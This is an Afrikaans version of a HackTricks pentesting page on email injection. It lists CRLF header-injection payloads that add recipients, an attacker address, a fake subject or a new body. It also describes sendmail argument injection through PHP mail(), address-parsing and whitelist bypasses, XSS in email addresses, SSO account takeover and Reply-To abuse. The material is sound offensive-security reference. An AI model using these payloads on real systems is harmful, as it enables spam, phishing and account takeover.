hacktricks/pentesting-web/email-injections.md

Email Injections

Gebruik Trickest om maklik werkvloei te bou en te automate wat aangedryf word deur die wêreld se mees gevorderde gemeenskap gereedskap.
Kry Toegang Vandag:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}

{% hint style="success" %} Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

• Kyk na die subskripsie planne!
• Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
• Deel hacking truuks deur PRs in te dien na die HackTricks en HackTricks Cloud github repos.

{% endhint %}

Inject in gestuurde e-pos

Inject Cc en Bcc na sender argument

From:sender@domain.com%0ACc:recipient@domain.co,%0ABcc:recipient1@domain.com

Die boodskap sal na die ontvanger en ontvanger1 rekeninge gestuur word.

Inject argument

From:sender@domain.com%0ATo:attacker@domain.com

Die boodskap sal na die oorspronklike ontvanger en die aanvaller rekening gestuur word.

Injeksie Onderwerp argument

From:sender@domain.com%0ASubject:This is%20Fake%20Subject

Die vals onderwerp sal by die oorspronklike onderwerp gevoeg word en in sommige gevalle dit vervang. Dit hang af van die e-posdiens se gedrag.

Verander die liggaam van die boodskap

Inspuit 'n twee-lyn voeding, skryf dan jou boodskap om die liggaam van die boodskap te verander.

From:sender@domain.com%0A%0AMy%20New%20%0Fake%20Message.

PHP mail() funksie eksploitering

# The function has the following definition:

php --rf mail

Function [ <internal:standard> function mail ] {
- Parameters [5] {
Parameter #0 [ <required> $to ]
Parameter #1 [ <required> $subject ]
Parameter #2 [ <required> $message ]
Parameter #3 [ <optional> $additional_headers ]
Parameter #4 [ <optional> $additional_parameters ]
}
}

Die 5de parameter ($additional_parameters)

Hierdie afdeling gaan gebaseer wees op hoe om hierdie parameter te misbruik, veronderstel dat 'n aanvaller dit beheer.

Hierdie parameter gaan by die opdraglyn gevoeg word wat PHP gaan gebruik om die binêre sendmail aan te roep. Dit sal egter gesuiwer word met die funksie escapeshellcmd($additional_parameters).

'n Aanvaller kan uittrekparameters vir sendmail inspuit in hierdie geval.

Verskille in die implementering van /usr/sbin/sendmail

sendmail koppelvlak word verskaf deur die MTA e-pos sagteware (Sendmail, Postfix, Exim ens.) wat op die stelsel geïnstalleer is. Alhoewel die basiese funksionaliteit (soos -t -i -f parameters) dieselfde bly vir kompatibiliteitsredes, verskil ander funksies en parameters baie, afhangende van die geïnstalleerde MTA.

Hier is 'n paar voorbeelde van verskillende manbladsye van die sendmail opdrag/koppelvlak:

• Sendmail MTA: http://www.sendmail.org/~ca/email/man/sendmail.html
• Postfix MTA: http://www.postfix.org/mailq.1.html
• Exim MTA: https://linux.die.net/man/8/eximReferences

Afhangende van die oorsprong van die sendmail binêre is verskillende opsies ontdek om dit te misbruik en leak lêers of selfs arbitrêre opdragte uit te voer. Kyk hoe in https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html

Inspuit in die e-pos naam

Geignoreerde dele van 'n e-pos

Die simbole: +, - en {} kan in seldsame gevalle gebruik word vir etikettering en word deur die meeste e-pos bedieners geignoreer.

• Byvoorbeeld: john.doe+intigriti@example.com → john.doe@example.com

Kommentaar tussen hakies () aan die begin of die einde sal ook geignoreer word.

• Byvoorbeeld: john.doe(intigriti)@example.com → john.doe@example.com

Whitelist omseiling

Aanhalings

IP's

Jy kan ook IP's as domeinnames tussen vierkante hakies gebruik:

• john.doe@[127.0.0.1]
• john.doe@[IPv6:2001:db8::1]

Ander kwesbaarhede

Derdeparty SSO

XSS

Sommige dienste soos github of salesforce laat jou toe om 'n e-pos adres met XSS payloads daarop te skep. As jy hierdie verskaffers kan gebruik om in te log op ander dienste en hierdie dienste nie korrek sanitiseer die e-pos nie, kan jy XSS veroorsaak.

Rekening-Oorname

As 'n SSO diens jou toelaat om 'n rekening te skep sonder om die gegewe e-pos adres te verifieer (soos salesforce) en dan kan jy daardie rekening gebruik om in te log in 'n ander diens wat vertrou op salesforce, kan jy enige rekening toegang.
Let daarop dat salesforce aandui of die gegewe e-pos verifieer is of nie, maar die toepassing moet hierdie inligting in ag neem.

Antwoord-Na

Jy kan 'n e-pos stuur met From: company.com en Replay-To: attacker.com en as enige outomatiese antwoord gestuur word omdat die e-pos van 'n interne adres gestuur is, mag die aanvaller in staat wees om daardie antwoord te ontvang.

Hard Bounce Tarief

Sekere dienste, soos AWS, implementeer 'n drempel bekend as die Hard Bounce Tarief, wat tipies op 10% gestel word. Dit is 'n kritieke maatstaf, veral vir e-pos afleweringsdienste. Wanneer hierdie tarief oorskry word, kan die diens, soos AWS se e-pos diens, opgeskort of geblokkeer word.

'n hard bounce verwys na 'n e-pos wat aan die sender teruggestuur is omdat die ontvanger se adres ongeldig of nie-bestaande is. Dit kan om verskeie redes gebeur, soos die e-pos wat na 'n nie-bestaande adres gestuur word, 'n domein wat nie werklik is nie, of die ontvanger se bediener se weiering om e-posse te aanvaar.

In die konteks van AWS, as jy 1000 e-posse stuur en 100 daarvan lei tot hard bounces (as gevolg van redes soos ongeldig adres of domeine), beteken dit 'n 10% hard bounce tarief. Om hierdie tarief te bereik of te oorskry kan AWS SES (Simple Email Service) laat blokkeer of jou e-pos stuur vermoëns opskort.

Dit is van kardinale belang om 'n lae hard bounce tarief te handhaaf om ononderbroke e-pos diens te verseker en sender reputasie te handhaaf. Monitering en bestuur van die kwaliteit van die e-pos adresse in jou poslyste kan aansienlik help om dit te bereik.

Vir meer gedetailleerde inligting kan AWS se amptelike dokumentasie oor die hantering van bounces en klagtes geraadpleeg word AWS SES Bounce Handling.

Verwysings

• https://resources.infosecinstitute.com/email-injection/
• https://exploitbox.io/paper/Pwning-PHP-Mail-Function-For-Fun-And-RCE.html
• https://drive.google.com/file/d/1iKL6wbp3yYwOmxEtAg1jEmuOf8RM8ty9/view
• https://www.youtube.com/watch?app=desktop&v=4ZsTKvfP1g0

{% hint style="success" %} Leer & oefen AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Leer & oefen GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Ondersteun HackTricks

• Kyk na die subskripsie planne!
• Sluit aan by die 💬 Discord groep of die telegram groep of volg ons op Twitter 🐦 @hacktricks_live.
• Deel hacking truuks deur PRs in te dien by die HackTricks en HackTricks Cloud github repos.

{% endhint %}

Gebruik Trickest om maklik te bou en werkvloei te outomatiseer wat deur die wêreld se mees gevorderde gemeenskap gereedskap aangedryf word.
Kry Toegang Vandag:

{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=email-injections" %}